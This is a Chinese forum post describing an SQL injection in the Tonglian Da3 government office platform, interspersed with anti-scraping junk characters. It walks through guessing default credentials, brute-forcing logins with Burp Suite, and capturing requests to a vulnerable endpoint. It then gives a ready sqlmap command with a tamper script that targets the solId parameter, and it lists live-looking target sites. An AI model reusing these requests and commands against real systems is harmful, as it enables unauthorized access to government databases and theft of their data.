找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1541|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) m/ Y) r/ `( k
% h0 h, t6 ^: w; M( D

" `3 A( T8 ]% q3 j

5 u& v& p2 J% J& ~- O 平台简介: * D- Z* \: l4 r& c- T

4 R2 @/ d, W( D. I P+ s

8 Z0 S' u% K4 ^) ?4 |& j ~) X8 `  7 \. N p- E+ l+ Y# H

% M' o+ g6 ]$ @/ I

# ~( m' L- \' K" c 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
$ \7 v7 S' ^7 ^, @ 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 l$ A) U9 R' ]3 p" d D% S 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 3 a. J; D6 H# x. v1 A' N& |' Q

& a0 v1 z4 j, N

$ p1 k. x, Z. Y8 s: @& S: k: u" I   . Z# ?- }. d: `

, n/ [+ k% N" ^% L* I

3 e* h6 a- D2 l8 G 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: / ?# o" s0 o: J- Z) @

4 O" h3 R- Z3 K4 y- v3 `' \

* m* m* y5 V% l* f$ o' T5 y$ ]  1 |/ I0 m3 N' b4 z* r* }5 Y6 ?

- V* K# u( z3 p Q3 z/ ~

- O0 ^+ ~1 q* F, X+ G http://1.1.1.1:7197/cap-aco/#(案例2-) S; h6 Y- [: a+ l! s

3 ~+ ~1 G0 H! T1 {' u- E( E' q

" Y+ J: Z( |% f' U( C' K http://www.XXOO.com (案例1-官网网站): v0 D" x8 @+ I! G- p* x1 X: r% V

4 L, }, j& q6 s0 m, H

5 q. {) r% f9 q3 }* O   6 J3 I* Q! q2 e/ d6 b% l

% }- ~5 D; w X8 V5 Q

6 ~, V7 q, W( d) J* B$ E 漏洞详情: : E$ q3 E: C. j+ ?

" m* t/ C. W% D2 ~* j4 ^. O

; m1 O& ~/ c9 ^: h  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 ! Y* N* u4 J9 N4 k. `

" A: k- ]0 m# c" M+ d

5 _9 {7 x, D5 O% j% P' o      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: & u( k* u! C' K0 z1 v2 \! `0 P

' C r* _: S# m+ A4 f* G

$ X( a/ |7 J. ?: F8 J1 P: R+ c   ( \/ q' s p4 g% S7 h

5 K; r5 I+ M8 R4 ]3 N( N! i

8 ]/ E2 k7 ?" C   * y4 m+ h' V5 @/ f2 L

5 r- C7 ~3 k- y5 W+ G z. F9 [

P# Z* {( b5 j2 s6 p status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:/ r2 j4 ?! ]. G! g

8 j1 f7 v8 X' ?9 s$ j

+ P$ T# K4 w* G0 ]& t" I1 o 1、案例1-官方网站; O o! C) T" u: N) L% b

9 y# \/ J. I1 u$ z# l. k9 p

" R" d+ l! A2 _ a GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 U5 I0 d( R8 X" a- G+ g. w, j

) o# X" E0 l. F% V

( D2 S+ ^' w6 a0 d* ~- j- l Host: www.XXOO.com 6 V9 w# S# @4 R! ~

: o1 u) m* f; z1 T$ a' V

" a0 N2 o4 P$ z* s Proxy-Connection: Keep-Alive- I0 N ~7 @' K: @. y0 o

) _# v3 ]% P8 W+ O5 c

1 ]" g! n! D' B8 | Accept: application/json, text/javascript, */*; q=0.01 ( z M' _) d( W& K, e, g

" d/ l! i1 \) F

0 Q) u" Q; g2 f Accept-Language: zh-CN ' P( L# ]' s7 `. o6 l

$ F6 p+ S6 B# M+ r8 o

0 G; b8 `% K' A" y( @ Content-Type: application/json $ w. a7 [2 p* L) \

2 K' @. P k7 a% P9 C- o

9 q" H0 m, s8 ~$ h8 M" t2 Y% R User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko- T1 i) {0 c2 W. t0 M: p

: v# Y* x- t4 G6 T$ a7 M# I

: T6 \' m7 h; J! y2 M: _ X-Requested-With: XMLHttpRequest 2 T1 N: i8 @) N/ f1 T6 y6 W1 C, o. ?

8 |3 l& o! w- p9 C

1 @/ i1 H( ^8 {3 k. f$ U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 z! f9 r8 Y3 c4 N/ Z2 }1 ~6 o

, e& D3 z$ a) I: x

: s5 a/ n- w/ x7 o Accept-Encoding: gzip, deflate, sdch \0 `& q( G4 W- a( T

: o1 d$ s/ E9 u) ?5 W

# w' }( [$ u* W# d Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e ' \) f# S6 r2 ~1 n

N! P1 f5 J3 S( H' D1 a* P

. |! s. z3 Z$ n' d& B 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: & c" S: v. p- ]1 e1 x0 R

5 s, n2 m" t# h9 `+ R" k

" z) i% Y% }$ M; \6 C   1 m8 m3 A% Z" O8 k+ L. u

! h8 |' p T. L" [3 b

) j7 }7 C7 U; ]0 V$ v5 R   9 H1 a' c5 \- T' {) I9 Q; ?) H# e

6 d- y3 u9 b9 E& i z9 I* t

4 S- F- K1 E# J5 Z9 c8 b3 F5 `   6 E+ |7 t/ W$ O, n' r8 w3 j

?, s1 z, J: b4 B3 U

2 \( C# f _2 n/ n. ]   5 f' N, }% n- N: E2 Y

1 v& D8 K: z: G$ ^7 ~0 t

5 O( }$ I" o z7 C3 B8 v# c& p6 H   ' U( |4 |' M. R

. q; @; p0 r6 J' a T+ {4 d

/ P8 j+ ?% s; ]; ]+ @ 2、案例2-某天河云平台 ! M8 K2 v; h k& h, t2 l1 T

. v* E O/ f6 B( E. v9 u$ B

% m- V* z: r( j) i GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 $ S( L5 q; \+ T2 _4 M w$ i+ f

0 x1 |2 c, F( l, b3 |/ N: J) ]

- k; B: |1 f5 p3 y3 L Host: 1.1.1.:7197/ }; c( w& W1 i8 ^

1 J$ }% u- {" Q- I

! M# b4 ~0 Q: D$ Y Accept: application/json, text/javascript, */*; q=0.01 7 R0 i% A$ v" N$ r3 G

% D! i8 G9 F7 d9 ^) W$ y1 V

) q" Q0 P# V5 e X-Requested-With: XMLHttpRequest" z6 l1 h" b+ P

; w! J0 [5 G# `

7 O( c! F+ G5 ]2 @2 Y. V) M User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0& L: E" h- x1 t9 G. B

: T) P( L: S/ N% y3 V

( C- i$ g2 P. k( e) s# }) ~ Content-Type: application/json 9 q j2 y# f q3 u) p4 w

& F8 C8 y& j) Y5 Q# T

* {! U1 i! R7 Q% l& ~ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 # w; U5 x$ H' F3 j) {' H- r+ p+ F9 N+ W

8 L Z$ d, J2 o+ S; t

9 {+ }# `) @5 y1 K& h Accept-Language: zh-CN,zh;q=0.8 4 N# g5 d9 a/ }/ f/ g* ^

' {) [5 F) F1 t/ o4 D" c

' v4 Z }* T, p/ u: } Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1% [1 K/ w2 o6 o% m- l

3 g% v, j/ @' N7 P

: R R9 `: P$ {, x9 ^ Connection: close% v3 d9 M* y5 u* l: O6 c

6 x9 [' K- [. ~7 \' U5 \! X

5 X: r. W; L8 K6 F* H, u; T 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:/ a Z ?8 ~7 x2 n1 P4 W: I

* `% Y# L$ M" C# ~* C, @

! s- s) P$ h n5 F9 Q" \, e# h# \   % e7 u4 j! h. e

' S5 v n: b5 c) Z- O' a2 s" p

% X/ C( I! Z0 @8 {: T
& }' T+ \% A$ s* o. I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表